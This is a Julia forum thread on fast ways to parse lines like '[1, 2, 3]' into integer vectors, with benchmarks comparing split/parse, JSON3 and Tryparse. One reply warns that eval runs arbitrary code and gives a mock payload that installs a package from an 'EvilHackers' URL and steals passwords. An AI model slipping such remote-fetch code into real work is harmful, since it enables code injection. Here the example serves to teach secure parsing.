Parsing a vector of vectors with Meta.parse?

I have a concrete problem, where Meta.parse(line) is unbearably slow.

My use-case is that I have a long .txt file, in which each line has the form
[x1, ..., xn], where x1,...,xn are specific integers. I must import/convert the whole file into a Vector{Vector{Int}}. My solution was

output = Vector{Int}[]
open(file, "r") do io
    for line in eachline(io)
        push!(output, eval(Meta.parse(line))) end end;

What would be a more efficient way of achieving this?

P.S. Let me add that I’d like the format of this .txt file to remain simple, so that it can be read also in other programming languages.

I’ve split this into a new topic and removed the ping to a particular person — this can be addressed by many folks here. If keeping your data portable is a goal, I’d just save it as a normal CSV (without the [] formatting). It’s far easier to use standard tools (like CSV.read) first and then restructure later. For example, you can read directly into a Matrix{Int} with CSV.read, and then just collect the rows into a vector:

using CSV: CSV, Tables
matrix = CSV.read(file, Tables.matrix; header=false)
output = collect(eachrow(matrix))
2 Likes

Does this work for you?

# /tmp/lel.txt
1 2 3 4 5
9 8 7 6 5
1 2 3 3 4
5 6 7 8 9
1 2 3 4 5


# REPL
julia> using DelimitedFiles

julia> x = readdlm("/tmp/lel.txt")
5×5 Matrix{Float64}:
 1.0  2.0  3.0  4.0  5.0
 9.0  8.0  7.0  6.0  5.0
 1.0  2.0  3.0  3.0  4.0
 5.0  6.0  7.0  8.0  9.0
 1.0  2.0  3.0  4.0  5.0

julia> [x[i, :] for i in axes(x, 2)]
5-element Vector{Vector{Float64}}:
 [1.0, 2.0, 3.0, 4.0, 5.0]
 [9.0, 8.0, 7.0, 6.0, 5.0]
 [1.0, 2.0, 3.0, 3.0, 4.0]
 [5.0, 6.0, 7.0, 8.0, 9.0]
 [1.0, 2.0, 3.0, 4.0, 5.0]
1 Like

Or simply:
collect.(eachrow(x))

See related post here.

PS:
without using eval you could do:

str = "[1, 2, 3]"
parse.(Int, split(filter(∉(['[',']']), str), ','))
3 Likes

Thank you for creating a new topic.

I don’t think using .csv is appropriate, since my Vector{Int}s have different lengths. In other words, my file represents a jagged/ragged array (use-case: each line represents a facet in a simplicial complex), hence why I want the end-result to be Vector{Vector{Int}}.

@roflmaostc No, the result contains Vector{Float64}s instead of Vector{Int64}s.

Yes, parse.(Int, split(line[2:end-1], ',')) is much much faster, thank you!

I was hoping for a more general solution, though. If each line represented, for instance, a Tuple{Vector{Int}, Vector{Int}} and the lengths of those vectors weren’t known beforehand, this approach would fail, no? I’d have to search for the index where the first vector stops and the second begins.

Isn’t there a general, fast way of just parsing the whole line as a Julia expression, that would have comparable efficiency to parse.(Int, split(...))?

In short, no, otherwise people would be doing this already instead of making libraries like Parsers.jl. To sum up the reasons why you don’t want to just eval(Meta.parse(...:

  1. The more assumptions, the more possible optimizations. People have already provided several good customizable options that make more assumptions than arbitrary code execution ever could.
  2. One of your goals is to let this file be read in other programming languages. Not every language writes arrays as [...] like Julia, so you’d need specific parsing instead of arbitrary code execution. Why not implement such parsing for all languages, possibly with a sensible file format?
  3. Arbitrary code execution is dangerous. If you’re the only person who ever writes and parses the files, you’re safe if you don’t sabotage yourself. Otherwise, you need to guard against someone sneaking
import Pkg
Pkg.add(url="https://github.com/EvilHackers/Hacking.jl")
using Hacking
stealpasswordsandyourdog()
  • into a file among a batch of other safe files. That was a cartoonish example of malware, a more likely possibility is someone naively writing code that interferes with your session, like assigning vectors to global variables pi = [3, 1, 4, 1, 5, 9, 2], or that fails to comply with your code, like Float64[1.0, 2.0, 3.0]. It’s preferable to narrow down a file format, vet inputs, and gracefully handle noncompliance.
2 Likes

Yes, but just because my file contained integers and not floats :slight_smile:

Shameless selfplug (using GitHub - thofma/Tryparse.jl: Parsing basic types in julia):

julia> using Tryparse

julia> Tryparse.parse(Vector{Int}, "[3, 2, 1]")
3-element Vector{Int64}:
 3
 2
 1

julia> Tryparse.parse(Vector{Vector{Int}}, "[[1, 2], [3, 4, 1]]")
2-element Vector{Vector{Int64}}:
 [1, 2]
 [3, 4, 1]

julia> Tryparse.parse(Tuple{Vector{Int}, Vector{Int}}, "([3, 2, 1], [3, 2, 1434])")
([3, 2, 1], [3, 2, 1434])

So you can just keep your original format.

Edit: This is free of eval.

3 Likes

From what I understand, your format should be valid JSON, i.e., you could just parse it like

s = join(string.([randn(i) for i = 2:8]), "\n");
JSON3.read.(eachline(IOBuffer(s)))
2 Likes

Thank you @bertschi @thofma !

Tryparse is still quite slow in my case (a million lines of vectors of length at most 30). But JSON3 was impressively fast. The fastest is still my manual parse.(Int, split(line[2:end-1], ',')).

I guess Benny’s point 1. holds: the more assumptions Julia has, the easier it is optimize.

1 Like